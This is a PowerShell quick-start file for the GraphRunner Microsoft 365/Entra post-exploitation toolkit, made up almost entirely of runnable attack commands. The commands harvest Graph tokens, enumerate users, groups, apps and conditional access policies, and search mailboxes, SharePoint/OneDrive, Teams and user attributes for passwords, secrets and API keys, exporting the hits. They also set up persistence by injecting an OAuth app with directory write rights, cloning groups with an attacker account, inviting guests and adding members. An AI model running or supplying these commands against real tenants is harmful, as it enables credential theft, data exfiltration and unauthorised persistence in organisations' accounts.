# Filename: GraphRunner-QuickStart.ps1
# Purpose: One-file quick notes + runnable commands for dafthack/GraphRunner.ps1
# Usage:
#   1) Save GraphRunner.ps1 next to this file
#   2) In PowerShell: . .\GraphRunner.ps1; . .\GraphRunner-QuickStart.ps1
#   3) Run the commands below as needed
# Notes:
# - Device code auth launches a user-friendly flow; tokens are stored in $tokens
# - Most modules accept -Tokens $tokens; keep your token scope minimal and rotate often
# - Avoid hardcoding secrets/refresh tokens in files; prefer secure input or env vars

# --- Load GraphRunner core ---
# Dot-source the main script so its functions are available in this session
. .\GraphRunner.ps1

# --- Discoverability / sanity checks ---
## List all modules defined by GraphRunner (good first step)
List-GraphRunnerModules  # Lists auth, recon, pillage, teams, supplemental modules

# --- Authentication ---
## Device-code login; stores access/refresh in $tokens and tenant in $tenantid
Get-GraphTokens  # Auth via device code; sets $tokens and $tenantid

## Optional: refresh the current token set when nearing expiry (uses $tokens.refresh_token)
Invoke-RefreshGraphTokens  # Renews $tokens with fresh access token

# One-shot enumeration + hunting; writes outputs to a timestamped folder
Invoke-GraphRunner -Tokens $tokens  # Recon, users, groups, CAPS, apps, mailbox/SP/Teams searches

# --- Focused recon / enumeration ---
# Conditional Access Policies (resolve GUIDs to names for readability)
Invoke-DumpCAPS -Tokens $tokens -ResolveGuids  # Dumps CAPs, resolves users/groups

# App registrations + enterprise apps + consents
Invoke-DumpApps -Tokens $tokens  # Enumerates apps and who consented to which scopes

# Full users list (UPNs) to a file
Get-AzureADUsers -Tokens $tokens -outfile .\users.txt  # Dumps directory users to users.txt

# Security groups with members; export to CSV (includes member IDs)
Get-SecurityGroups -Tokens $tokens -OutputFile .\security_groups.csv  # Groups + member IDs

# --- Pillage / search (delegated token scopes required) ---
# Mailbox deep search for the current user; paginate and export to CSV
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 500 -OutFile .\mail.csv -PageResults  # Search mail, export results

# SharePoint + OneDrive KQL search across accessible drives; paginate and export
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password filetype:xlsx' -PageResults -ResultCount 500 -OutFile .\sp_hits.csv  # Search SP/OD, export results

# Teams channel message search via Substrate; export to CSV
Invoke-SearchTeams -Tokens $tokens -SearchTerm "password" -ResultSize 200 -OutFile .\teams_hits.csv  # Search Teams messages, export results

# --- Helpful utilities ---
# Check that your current token actually hits Graph /me successfully
Invoke-CheckAccess -Tokens $tokens  # Validates Graph reachability with current token

# Stand up a tiny HTTP server (used by email viewer generated by Invoke-SearchMailbox)
# Run inside the folder created by Invoke-SearchMailbox to serve emailviewer.html
Invoke-HTTPServer -port 8000  # Serves current directory files at http://localhost:8000/

# Authentication modules  - obtain/refresh tokens (user or app OAuth flows)

Get-GraphTokens                                               # interactive device-code auth -> sets $Tokens, $TenantID
Get-AzureAppTokens -ClientId $env:GRAPH_APP_CLIENT_ID -TenantId $env:GRAPH_APP_TENANT_ID -ClientSecret $env:GRAPH_APP_CLIENT_SECRET  # app auth -> sets $Tokens
Invoke-RefreshGraphTokens -Tokens $Tokens                      # use refresh_token to renew $Tokens
Invoke-CheckAccess -Tokens $Tokens                             # sanity-check current token / Graph reachability
Invoke-AutoTokenRefresh -Tokens $Tokens -IntervalMinutes 25    # background refresh loop (use cautiously)

# Recon & Enumeration  - tenant, users, groups, apps, SharePoint/OneDrive, mailbox visibility, CA policies

Invoke-GraphRecon -Tokens $Tokens -OutFile .\out\graph_recon.json                       # full tenant recon -> JSON
Invoke-DumpCAPS -Tokens $Tokens -ResolveGuids -OutFile .\out\conditional_access.json   # dump Conditional Access (GUID->name)
Invoke-DumpApps -Tokens $Tokens -OutFile .\out\apps.json                               # enumerate app registrations & consents
Get-AzureADUsers -Tokens $Tokens | Select DisplayName,UserPrincipalName,AccountEnabled,Id | Export-Csv .\out\users.csv -NoTypeInformation
Get-SecurityGroups -Tokens $Tokens | Export-Csv .\out\security_groups.csv -NoTypeInformation

# Persistence / Admin abuse  - app injection, group cloning, guest invites, adding group members

Invoke-InjectOAuthApp -Tokens $Tokens -AppName 'PoC-App' -RedirectUrl 'http://localhost' -Permissions 'Directory.ReadWrite.All'
Invoke-SecurityGroupCloner -Tokens $Tokens -GroupId '<source-group-id>' -NewName 'Clone-<name>' -InjectUserUpn 'attacker@domain'
Invoke-InviteGuest -Tokens $Tokens -GuestEmail 'guest@example.com' -DisplayName 'Guest PoC'
Invoke-AddGroupMember -Tokens $Tokens -GroupId '<group-id>' -MemberUpn 'user@domain'
Invoke-DeleteOAuthApp -Tokens $Tokens -AppId '<app-id>'    # destructive: deletes app registration

# Pillage / Data access  - search mailboxes, Teams, SharePoint/OneDrive content (read-only if scopes permit)

Invoke-SearchMailbox -Tokens $Tokens -SearchTerm "password OR secret" -MessageCount 1000 -OutFile .\out\mail_secrets.csv -PageResults
Invoke-SearchSharePointAndOneDrive -Tokens $Tokens -SearchTerm 'password filetype:xlsx' -PageResults -ResultCount 500 -OutFile .\out\sp_password_xlsx.csv
Invoke-SearchTeams -Tokens $Tokens -SearchTerm "credential OR token" -ResultSize 500 -OutFile .\out\teams_tokens.csv
Invoke-SearchUserAttributes -Tokens $Tokens -SearchTerm "api_key OR secret" -OutFile .\out\user_attribute_hits.csv
# Download an identified item (read-only): Invoke-DriveFileDownload -Tokens $Tokens -DriveId '<drive-id>' -ItemId '<item-id>' -OutFile .\out\download.bin

# Teams modules  - enumerate channels, webhooks, create/send messages via webhooks

Get-TeamsChannels -Tokens $Tokens | Export-Csv .\out\teams_channels.csv -NoTypeInformation
Get-TeamsApps -Tokens $Tokens | Export-Csv .\out\teams_apps.csv -NoTypeInformation
Get-Webhooks -Tokens $Tokens | Export-Csv .\out\teams_webhooks.csv -NoTypeInformation
## !! AUTH REQUIRED - Create-Webhook -Tokens $Tokens -TeamId '<team-id>' -ChannelId '<channel-id>' -Name 'pst-hook'    # creates webhook in channel
## Send a message via webhook (no Graph auth needed for legacy incoming webhook): Invoke-RestMethod -Uri '<webhook-url>' -Method Post -Body (ConvertTo-Json @{text='test message'})
## Supplemental  - cleanup helpers (delete apps, remove members), downloads, token import

# Delete OAuth app (requires authorization) - Invoke-DeleteOAuthApp -Tokens $Tokens -AppId '<app-id>'
Invoke-RemoveGroupMember -Tokens $Tokens -GroupId '<group-id>' -MemberId '<member-id>'    # remove member (requires permission)
Invoke-DriveFileDownload -Tokens $Tokens -DriveId '<drive-id>' -ItemId '<item-id>' -OutFile .\out\file_download.bin
Invoke-ImportTokens -Tokens $Tokens -FilePath .\tokens.json    # import tokens from file into session (use carefully)
Invoke-HTTPServer -port 8000                                   # serve current directory (use to review search output in browser)
